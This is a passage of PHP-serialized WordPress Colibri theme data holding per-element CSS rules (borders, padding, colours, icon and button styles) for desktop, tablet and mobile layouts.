100% ;\n  border-top-width: 10px;\n  border-top-color: rgb(0,0,0);\n  border-top-style: none;\n  border-right-width: 10px;\n  border-right-color: rgb(0,0,0);\n  border-right-style: none;\n  border-bottom-width: 10px;\n  border-bottom-color: rgb(0,0,0);\n  border-bottom-style: none;\n  border-left-width: 10px;\n  border-left-color: rgb(0,0,0);\n  border-left-style: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:609;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:610;a:3:{s:7:\"desktop\";s:159:\".style-610 > .h-y-container > *:not(:last-child) {\n  margin-bottom: 15px;\n}\n#colibri .style-610 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:611;a:3:{s:7:\"desktop\";s:148:\"#colibri .style-611 .text-wrapper-fancy svg path {\n  stroke: #000000;\n  stroke-linejoin: initial;\n  stroke-linecap: initial;\n  stroke-width: 8px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:612;a:3:{s:7:\"desktop\";s:107:\"#colibri .style-612 ul {\n  list-style-type: disc;\n}\n#colibri .style-612 ol {\n  list-style-type: decimal;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:613;a:3:{s:7:\"desktop\";s:380:\"#colibri .style-613 .icon-container {\n  fill: rgb(163, 206, 250);\n  width: 20px ;\n  height: 20px;\n}\n#colibri .style-613 .icon-container:hover {\n  fill: #303e7a;\n}\n#colibri .style-613 .icon-container:hover {\n  fill: #303e7a;\n}\n#colibri .style-613 .social-icon-container {\n  margin-right: 5px;\n  padding-top: 5px;\n  padding-right: 5px;\n  padding-bottom: 5px;\n  padding-left: 5px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:614;a:3:{s:7:\"desktop\";s:380:\"#colibri .style-614 .social-icon-container {\n  margin-right: 5px;\n  padding-top: 5px;\n  padding-right: 5px;\n  padding-bottom: 5px;\n  padding-left: 5px;\n}\n#colibri .style-614 .icon-container {\n  fill: rgb(163, 206, 250);\n  width: 20px ;\n  height: 20px;\n}\n#colibri .style-614 .icon-container:hover {\n  fill: #303e7a;\n}\n#colibri .style-614 .icon-container:hover {\n  fill: #303e7a;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:615;a:3:{s:7:\"desktop\";s:380:\"#colibri .style-615 .social-icon-container {\n  margin-right: 5px;\n  padding-top: 5px;\n  padding-right: 5px;\n  padding-bottom: 5px;\n  padding-left: 5px;\n}\n#colibri .style-615 .icon-container {\n  fill: rgb(163, 206, 250);\n  width: 20px ;\n  height: 20px;\n}\n#colibri .style-615 .icon-container:hover {\n  fill: #303e7a;\n}\n#colibri .style-615 .icon-container:hover {\n  fill: #303e7a;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:616;a:3:{s:7:\"desktop\";s:380:\"#colibri .style-616 .social-icon-container {\n  margin-right: 5px;\n  padding-top: 5px;\n  padding-right: 5px;\n  padding-bottom: 5px;\n  padding-left: 5px;\n}\n#colibri .style-616 .icon-container {\n  fill: rgb(163, 206, 250);\n  width: 20px ;\n  height: 20px;\n}\n#colibri .style-616 .icon-container:hover {\n  fill: #303e7a;\n}\n#colibri .style-616 .icon-container:hover {\n  fill: #303e7a;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:617;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:618;a:3:{s:7:\"desktop\";s:83:\"#colibri .style-618 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:619;a:3:{s:7:\"desktop\";s:148:\"#colibri .style-619 .text-wrapper-fancy svg path {\n  stroke: #000000;\n  stroke-linejoin: initial;\n  stroke-linecap: initial;\n  stroke-width: 8px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:620;a:3:{s:7:\"desktop\";s:116:\"#colibri .style-620 {\n  height: auto;\n  min-height: unset;\n  background-color: #F5FAFD;\n  background-image: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:623;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:624;a:3:{s:7:\"desktop\";s:83:\"#colibri .style-624 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:625;a:3:{s:7:\"desktop\";s:148:\"#colibri .style-625 .text-wrapper-fancy svg path {\n  stroke: #000000;\n  stroke-linejoin: initial;\n  stroke-linecap: initial;\n  stroke-width: 8px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:626;a:3:{s:7:\"desktop\";s:114:\"#colibri .style-626 {\n  height: auto;\n  min-height: unset;\n  background-color: unset;\n  background-image: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:627;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:628;a:3:{s:7:\"desktop\";s:650:\".style-628 > .h-y-container > *:not(:last-child) {\n  margin-bottom: 0px;\n}\n#colibri .style-628 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n  box-shadow: 0px 1px 3px 1px rgba(0, 0, 0, 0.1) ;\n  background-color: #f6f8fa;\n  background-image: none;\n  border-top-width: 1px;\n  border-top-color: rgb(224, 225, 225);\n  border-top-style: solid;\n  border-right-width: 1px;\n  border-right-color: rgb(224, 225, 225);\n  border-right-style: solid;\n  border-bottom-width: 1px;\n  border-bottom-color: rgb(224, 225, 225);\n  border-bottom-style: solid;\n  border-left-width: 1px;\n  border-left-color: rgb(224, 225, 225);\n  border-left-style: solid;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:629;a:3:{s:7:\"desktop\";s:649:\"#colibri .style-629-image {\n  opacity: 1;\n}\n#colibri .style-629-caption {\n  margin-top: 10px;\n}\n#colibri .style-629-frameImage {\n  z-index: -1;\n  transform: translateX(10%) translateY(10%);\n  transform-origin: center center 0px;\n  background-color: rgb(0,0,0);\n  height: 100%;\n  width: 100% ;\n  border-top-width: 10px;\n  border-top-color: rgb(0,0,0);\n  border-top-style: none;\n  border-right-width: 10px;\n  border-right-color: rgb(0,0,0);\n  border-right-style: none;\n  border-bottom-width: 10px;\n  border-bottom-color: rgb(0,0,0);\n  border-bottom-style: none;\n  border-left-width: 10px;\n  border-left-color: rgb(0,0,0);\n  border-left-style: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:630;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:631;a:3:{s:7:\"desktop\";s:159:\".style-631 > .h-y-container > *:not(:last-child) {\n  margin-bottom: 15px;\n}\n#colibri .style-631 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:632;a:3:{s:7:\"desktop\";s:148:\"#colibri .style-632 .text-wrapper-fancy svg path {\n  stroke: #000000;\n  stroke-linejoin: initial;\n  stroke-linecap: initial;\n  stroke-width: 8px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:633;a:3:{s:7:\"desktop\";s:107:\"#colibri .style-633 ul {\n  list-style-type: disc;\n}\n#colibri .style-633 ol {\n  list-style-type: decimal;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:634;a:3:{s:7:\"desktop\";s:380:\"#colibri .style-634 .icon-container {\n  fill: rgb(163, 206, 250);\n  width: 20px ;\n  height: 20px;\n}\n#colibri .style-634 .icon-container:hover {\n  fill: #303e7a;\n}\n#colibri .style-634 .icon-container:hover {\n  fill: #303e7a;\n}\n#colibri .style-634 .social-icon-container {\n  margin-right: 5px;\n  padding-top: 5px;\n  padding-right: 5px;\n  padding-bottom: 5px;\n  padding-left: 5px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:635;a:3:{s:7:\"desktop\";s:380:\"#colibri .style-635 .icon-container {\n  fill: rgb(163, 206, 250);\n  width: 20px ;\n  height: 20px;\n}\n#colibri .style-635 .icon-container:hover {\n  fill: #303e7a;\n}\n#colibri .style-635 .icon-container:hover {\n  fill: #303e7a;\n}\n#colibri .style-635 .social-icon-container {\n  margin-right: 5px;\n  padding-top: 5px;\n  padding-right: 5px;\n  padding-bottom: 5px;\n  padding-left: 5px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:636;a:3:{s:7:\"desktop\";s:380:\"#colibri .style-636 .icon-container {\n  fill: rgb(163, 206, 250);\n  width: 20px ;\n  height: 20px;\n}\n#colibri .style-636 .icon-container:hover {\n  fill: #303e7a;\n}\n#colibri .style-636 .icon-container:hover {\n  fill: #303e7a;\n}\n#colibri .style-636 .social-icon-container {\n  margin-right: 5px;\n  padding-top: 5px;\n  padding-right: 5px;\n  padding-bottom: 5px;\n  padding-left: 5px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:637;a:3:{s:7:\"desktop\";s:380:\"#colibri .style-637 .social-icon-container {\n  margin-right: 5px;\n  padding-top: 5px;\n  padding-right: 5px;\n  padding-bottom: 5px;\n  padding-left: 5px;\n}\n#colibri .style-637 .icon-container {\n  fill: rgb(163, 206, 250);\n  width: 20px ;\n  height: 20px;\n}\n#colibri .style-637 .icon-container:hover {\n  fill: #303e7a;\n}\n#colibri .style-637 .icon-container:hover {\n  fill: #303e7a;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:638;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:639;a:3:{s:7:\"desktop\";s:83:\"#colibri .style-639 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:640;a:3:{s:7:\"desktop\";s:148:\"#colibri .style-640 .text-wrapper-fancy svg path {\n  stroke: #000000;\n  stroke-linejoin: initial;\n  stroke-linecap: initial;\n  stroke-width: 8px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:641;a:3:{s:7:\"desktop\";s:107:\"#colibri .style-641 ol {\n  list-style-type: decimal;\n}\n#colibri .style-641 ul {\n  list-style-type: disc;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:642;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:656;a:3:{s:7:\"desktop\";s:116:\"#colibri .style-656 {\n  height: auto;\n  min-height: unset;\n  background-color: #F5FAFD;\n  background-image: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:657;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:658;a:3:{s:7:\"desktop\";s:159:\".style-658 > .h-y-container > *:not(:last-child) {\n  margin-bottom: 10px;\n}\n#colibri .style-658 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:659;a:3:{s:7:\"desktop\";s:87:\"#colibri .style-659-icon {\n  fill: rgb(3, 169, 244);\n  width: 24px ;\n  height: 24px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:660;a:3:{s:7:\"desktop\";s:107:\"#colibri .style-660 ol {\n  list-style-type: decimal;\n}\n#colibri .style-660 ul {\n  list-style-type: disc;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:661;a:3:{s:7:\"desktop\";s:1439:\"#colibri .style-661-image {\n  opacity: 1;\n  border-top-width: 0px;\n  border-top-style: none;\n  border-top-left-radius: 300px;\n  border-top-right-radius: 300px;\n  border-right-width: 0px;\n  border-right-style: none;\n  border-bottom-width: 0px;\n  border-bottom-style: none;\n  border-bottom-left-radius: 300px;\n  border-bottom-right-radius: 300px;\n  border-left-width: 0px;\n  border-left-style: none;\n}\n#colibri .style-661-overlay {\n  border-top-width: 0px;\n  border-top-style: none;\n  border-top-left-radius: 300px;\n  border-top-right-radius: 300px;\n  border-right-width: 0px;\n  border-right-style: none;\n  border-bottom-width: 0px;\n  border-bottom-style: none;\n  border-bottom-left-radius: 300px;\n  border-bottom-right-radius: 300px;\n  border-left-width: 0px;\n  border-left-style: none;\n}\n#colibri .style-661-caption {\n  margin-top: 10px;\n}\n#colibri .style-661-frameImage {\n  z-index: -1;\n  transform: translateX(10%) translateY(10%);\n  transform-origin: center center 0px;\n  background-color: rgb(0,0,0);\n  height: 100%;\n  width: 100% ;\n  border-top-width: 10px;\n  border-top-color: rgb(0,0,0);\n  border-top-style: none;\n  border-right-width: 10px;\n  border-right-color: rgb(0,0,0);\n  border-right-style: none;\n  border-bottom-width: 10px;\n  border-bottom-color: rgb(0,0,0);\n  border-bottom-style: none;\n  border-left-width: 10px;\n  border-left-color: rgb(0,0,0);\n  border-left-style: none;\n}\n#colibri .style-661 {\n  text-align: center;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:662;a:3:{s:7:\"desktop\";s:148:\"#colibri .style-662 .text-wrapper-fancy svg path {\n  stroke: #000000;\n  stroke-linejoin: initial;\n  stroke-linecap: initial;\n  stroke-width: 8px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:663;a:3:{s:7:\"desktop\";s:201:\"#colibri .style-663 {\n  font-style: italic;\n}\n#colibri .style-663 p {\n  font-style: italic;\n}\n#colibri .style-663 ol {\n  list-style-type: decimal;\n}\n#colibri .style-663 ul {\n  list-style-type: disc;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:668;a:3:{s:7:\"desktop\";s:61:\"#colibri .style-668 {\n  height: auto;\n  min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:669;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:670;a:3:{s:7:\"desktop\";s:83:\"#colibri .style-670 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:671;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:672;a:3:{s:7:\"desktop\";s:83:\"#colibri .style-672 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:76:\".style-672 > .h-y-container > *:not(:last-child) {\n  margin-bottom: 20px;\n}\n\";}i:673;a:3:{s:7:\"desktop\";s:755:\"#colibri .style-673-icon {\n  fill: #303e7a;\n  width: 50px ;\n  height: 50px;\n  border-top-width: 2px;\n  border-top-color: #303e7a;\n  border-top-style: solid;\n  border-top-left-radius: 300px;\n  border-top-right-radius: 300px;\n  border-right-width: 2px;\n  border-right-color: #303e7a;\n  border-right-style: solid;\n  border-bottom-width: 2px;\n  border-bottom-color: #303e7a;\n  border-bottom-style: solid;\n  border-bottom-left-radius: 300px;\n  border-bottom-right-radius: 300px;\n  border-left-width: 2px;\n  border-left-color: #303e7a;\n  border-left-style: solid;\n  padding-top: 10px;\n  padding-right: 10px;\n  padding-bottom: 10px;\n  padding-left: 10px;\n}\n#colibri .style-673-icon:hover {\n  fill: #f6f8fa;\n  background-color: unset;\n  background-image: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:674;a:3:{s:7:\"desktop\";s:81:\"#colibri .style-674 {\n  text-align: left;\n  height: auto;\n  min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:46:\"#colibri .style-674 {\n  text-align: center;\n}\n\";}i:675;a:3:{s:7:\"desktop\";s:344:\"#colibri .style-675 p,#colibri .style-675  h1,#colibri .style-675  h2,#colibri .style-675  h3,#colibri .style-675  h4,#colibri .style-675  h5,#colibri .style-675  h6 {\n  color: rgb(32, 42, 84);\n}\n#colibri .style-675 .text-wrapper-fancy svg path {\n  stroke: #000000;\n  stroke-linejoin: initial;\n  stroke-linecap: initial;\n  stroke-width: 8px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:676;a:3:{s:7:\"desktop\";s:249:\"#colibri .style-676 {\n  font-size: 16px;\n  color: rgb(64, 85, 169);\n}\n#colibri .style-676 p {\n  font-size: 16px;\n  color: rgb(64, 85, 169);\n}\n#colibri .style-676 ol {\n  list-style-type: decimal;\n}\n#colibri .style-676 ul {\n  list-style-type: disc;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:677;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:678;a:3:{s:7:\"desktop\";s:1304:\"#colibri .style-678-icon {\n  width: 12px;\n  height: 12px;\n  margin-right: 10px;\n  margin-left: 0px;\n}\n#colibri .style-678 {\n  text-align: center;\n  background-color: #303e7a;\n  background-image: none;\n  font-family: Open Sans;\n  font-weight: 600;\n  text-transform: uppercase;\n  font-size: 12px;\n  line-height: 1;\n  letter-spacing: 1px;\n  color: #fff;\n  border-top-width: 2px;\n  border-top-color: #303e7a;\n  border-top-style: solid;\n  border-top-left-radius: 5px;\n  border-top-right-radius: 5px;\n  border-right-width: 2px;\n  border-right-color: #303e7a;\n  border-right-style: solid;\n  border-bottom-width: 2px;\n  border-bottom-color: #303e7a;\n  border-bottom-style: solid;\n  border-bottom-left-radius: 5px;\n  border-bottom-right-radius: 5px;\n  border-left-width: 2px;\n  border-left-color: #303e7a;\n  border-left-style: solid;\n  padding-top: 12px;\n  padding-right: 24px;\n  padding-bottom: 12px;\n  padding-left: 24px;\n  box-shadow: none;\n}\n#colibri .style-678:hover,#colibri .style-678:focus {\n  background-color: rgb(7, 29, 122);\n  border-top-color: rgb(7, 29, 122);\n  border-right-color: rgb(7, 29, 122);\n  border-bottom-color: rgb(7, 29, 122);\n  border-left-color: rgb(7, 29, 122);\n}\n#colibri .style-678:active .style-678-icon {\n  width: 12px;\n  height: 12px;\n  margin-right: 10px;\n  margin-left: 0px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:679;a:3:{s:7:\"desktop\";s:1284:\"#colibri .style-679-icon {\n  width: 12px;\n  height: 12px;\n  margin-right: 10px;\n  margin-left: 0px;\n}\n#colibri .style-679 {\n  text-align: center;\n  background-color: #303e7a;\n  background-image: none;\n  font-family: Open Sans;\n  font-weight: 600;\n  text-transform: uppercase;\n  font-size: 12px;\n  line-height: 1;\n  letter-spacing: 1px;\n  color: #fff;\n  border-top-width: 2px;\n  border-top-color: #303e7a;\n  border-top-style: solid;\n  border-top-left-radius: 5px;\n  border-top-right-radius: 5px;\n  border-right-width: 2px;\n  border-right-color: #303e7a;\n  border-right-style: solid;\n  border-bottom-width: 2px;\n  border-bottom-color: #303e7a;\n  border-bottom-style: solid;\n  border-bottom-left-radius: 5px;\n  border-bottom-right-radius: 5px;\n  border-left-width: 2px;\n  border-left-color: #303e7a;\n  border-left-style: solid;\n  padding-top: 12px;\n  padding-right: 24px;\n  padding-bottom: 12px;\n  padding-left: 24px;\n}\n#colibri .style-679:hover,#colibri .style-679:focus {\n  background-color: rgb(7, 29, 122);\n  border-top-color: rgb(7, 29, 122);\n  border-right-color: rgb(7, 29, 122);\n  border-bottom-color: rgb(7, 29, 122);\n  border-left-color: rgb(7, 29, 122);\n}\n#colibri .style-679:active .style-679-icon {\n  width: 12px;\n  height: 12px;\n  margin-right: 10px;\n  margin-left: 0px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:680;a:3:{s:7:\"desktop\";s:116:\"#colibri .style-680 {\n  height: auto;\n  min-height: unset;\n  background-color: #F5FAFD;\n  background-image: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:681;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:683;a:3:{s:7:\"desktop\";s:83:\"#colibri .style-683 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:684;a:3:{s:7:\"desktop\";s:148:\"#colibri .style-684 .text-wrapper-fancy svg path {\n  stroke: #000000;\n  stroke-linejoin: initial;\n  stroke-linecap: initial;\n  stroke-width: 8px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:694;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:695;a:3:{s:7:\"desktop\";s:83:\"#colibri .style-695 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:696;a:3:{s:7:\"desktop\";s:83:\"#colibri .style-696 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:697;a:3:{s:7:\"desktop\";s:83:\"#colibri .style-697 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:698;a:3:{s:7:\"desktop\";s:83:\"#colibri .style-698 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:699;a:3:{s:7:\"desktop\";s:340:\"#colibri .style-699 p,#colibri .style-699  h1,#colibri .style-699  h2,#colibri .style-699  h3,#colibri .style-699  h4,#colibri .style-699  h5,#colibri .style-699  h6 {\n  text-align: center;\n}\n#colibri .style-699 .text-wrapper-fancy svg path {\n  stroke: #000000;\n  stroke-linejoin: initial;\n  stroke-linecap: initial;\n  stroke-width: 8px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:700;a:3:{s:7:\"desktop\";s:649:\"#colibri .style-700-image {\n  opacity: 1;\n}\n#colibri .style-700-caption {\n  margin-top: 10px;\n}\n#colibri .style-700-frameImage {\n  z-index: -1;\n  transform: translateX(10%) translateY(10%);\n  transform-origin: center center 0px;\n  background-color: rgb(0,0,0);\n  height: 100%;\n  width: 100% ;\n  border-top-width: 10px;\n  border-top-color: rgb(0,0,0);\n  border-top-style: none;\n  border-right-width: 10px;\n  border-right-color: rgb(0,0,0);\n  border-right-style: none;\n  border-bottom-width: 10px;\n  border-bottom-color: rgb(0,0,0);\n  border-bottom-style: none;\n  border-left-width: 10px;\n  border-left-color: rgb(0,0,0);\n  border-left-style: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:701;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:702;a:3:{s:7:\"desktop\";s:83:\"#colibri .style-702 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:703;a:3:{s:7:\"desktop\";s:83:\"#colibri .style-703 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:704;a:3:{s:7:\"desktop\";s:148:\"#colibri .style-704 .text-wrapper-fancy svg path {\n  stroke: #000000;\n  stroke-linejoin: initial;\n  stroke-linecap: initial;\n  stroke-width: 8px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:707;a:3:{s:7:\"desktop\";s:649:\"#colibri .style-707-image {\n  opacity: 1;\n}\n#colibri .style-707-caption {\n  margin-top: 10px;\n}\n#colibri .style-707-frameImage {\n  z-index: -1;\n  transform: translateX(10%) translateY(10%);\n  transform-origin: center center 0px;\n  background-color: rgb(0,0,0);\n  height: 100%;\n  width: 100% ;\n  border-top-width: 10px;\n  border-top-color: rgb(0,0,0);\n  border-top-style: none;\n  border-right-width: 10px;\n  border-right-color: rgb(0,0,0);\n  border-right-style: none;\n  border-bottom-width: 10px;\n  border-bottom-color: rgb(0,0,0);\n  border-bottom-style: none;\n  border-left-width: 10px;\n  border-left-color: rgb(0,0,0);\n  border-left-style: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:709;a:3:{s:7:\"desktop\";s:407:\"#colibri .style-709 .social-icon-container {\n  margin-right: 5px;\n  padding-top: 5px;\n  padding-right: 5px;\n  padding-bottom: 5px;\n  padding-left: 5px;\n  background-color: rgb(7, 146, 226);\n}\n#colibri .style-709 .icon-container {\n  fill: #f6f8fa;\n  width: 20px ;\n  height: 20px;\n}\n#colibri .style-709 .icon-container:hover {\n  fill: #303e7a;\n}\n#colibri .style-709 .icon-container:hover {\n  fill: #303e7a;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:710;a:3:{s:7:\"desktop\";s:107:\"#colibri .style-710 ol {\n  list-style-type: decimal;\n}\n#colibri .style-710 ul {\n  list-style-type: disc;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:711;a:3:{s:7:\"desktop\";s:83:\"#colibri .style-711 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:740;a:3:{s:7:\"desktop\";s:469:\"#colibri .style-740 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n  border-top-width: 1px;\n  border-top-color: rgb(224, 225, 225);\n  border-top-style: solid;\n  border-right-width: 1px;\n  border-right-color: rgb(224, 225, 225);\n  border-right-style: solid;\n  border-bottom-width: 1px;\n  border-bottom-color: rgb(224, 225, 225);\n  border-bottom-style: solid;\n  border-left-width: 1px;\n  border-left-color: rgb(224, 225, 225);\n  border-left-style: solid;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:745;a:3:{s:7:\"desktop\";s:1529:\"#colibri .style-745-image {\n  opacity: 1;\n  border-top-width: 0px;\n  border-top-style: none;\n  border-top-left-radius: 0px;\n  border-top-right-radius: 0px;\n  border-right-width: 0px;\n  border-right-style: none;\n  border-bottom-width: 0px;\n  border-bottom-style: none;\n  border-bottom-left-radius: 0px;\n  border-bottom-right-radius: 0px;\n  border-left-width: 0px;\n  border-left-style: none;\n  box-shadow: none;\n}\n#colibri .style-745-overlay {\n  border-top-width: 0px;\n  border-top-style: none;\n  border-top-left-radius: 0px;\n  border-top-right-radius: 0px;\n  border-right-width: 0px;\n  border-right-style: none;\n  border-bottom-width: 0px;\n  border-bottom-style: none;\n  border-bottom-left-radius: 0px;\n  border-bottom-right-radius: 0px;\n  border-left-width: 0px;\n  border-left-style: none;\n}\n#colibri .style-745-caption {\n  margin-top: 10px;\n}\n#colibri .style-745-frameImage {\n  z-index: -1;\n  transform: translateX(10%) translateY(10%);\n  transform-origin: center center 0px;\n  background-color: rgb(0,0,0);\n  height: 100%;\n  width: 100% ;\n  border-top-width: 10px;\n  border-top-color: rgb(0,0,0);\n  border-top-style: none;\n  border-top-left-radius: 0px;\n  border-top-right-radius: 0px;\n  border-right-width: 10px;\n  border-right-color: rgb(0,0,0);\n  border-right-style: none;\n  border-bottom-width: 10px;\n  border-bottom-color: rgb(0,0,0);\n  border-bottom-style: none;\n  border-bottom-left-radius: 0px;\n  border-bottom-right-radius: 0px;\n  border-left-width: 10px;\n  border-left-color: rgb(0,0,0);\n  border-left-style: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:746;a:3:{s:7:\"desktop\";s:148:\"#colibri .style-746 .text-wrapper-fancy svg path {\n  stroke: #000000;\n  stroke-linejoin: initial;\n  stroke-linecap: initial;\n  stroke-width: 8px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:747;a:3:{s:7:\"desktop\";s:107:\"#colibri .style-747 ul {\n  list-style-type: disc;\n}\n#colibri .style-747 ol {\n  list-style-type: decimal;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:749;a:3:{s:7:\"desktop\";s:629:\"#colibri .style-749-icon {\n  fill: rgb(163, 206, 250);\n  width: 20px ;\n  height: 20px;\n  border-top-width: 1px;\n  border-top-color: rgb(125, 79, 79);\n  border-top-style: 